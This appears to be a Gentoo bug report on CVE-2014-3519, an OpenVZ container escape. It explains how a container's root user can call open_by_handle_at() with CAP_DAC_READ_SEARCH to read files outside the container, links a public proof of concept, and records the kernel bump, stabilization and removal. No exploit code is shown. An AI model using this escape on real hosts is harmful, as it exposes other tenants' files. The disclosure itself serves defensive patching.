An attacker is able to access files outside of his container. Function open_by_handle_at() enables process to access files on a mounted filesystem using file_handle structure. This structure is using inode numbers to differentiate files. Calling this function requires CAP_DAC_READ_SEARCH capability and superuser inside a container by default has this capability. This enables an attacker to bypass simfs restrictions and access all files on an underlying filesystem including other VE’s residing on the same filesystem. This is the same issue as the one affecting docker which was discovered recently by by Sebastian Krahmer. He wrote about it on this list http://www.openwall.com/lists/oss-security/2014/06/18/4 . This vulnerability is identified by CVE-2014-3519 . For further technical information please refer to Sebastian Krahmers post and POC (http://stealth.openwall.net/xSports/shocker.c).
Bumped to 2.6.32.90.5. Security, please handle this.
Pva, please stabilize ASAP.
x86/amd64 stable.
This version removed from tree
GLSA Vote: No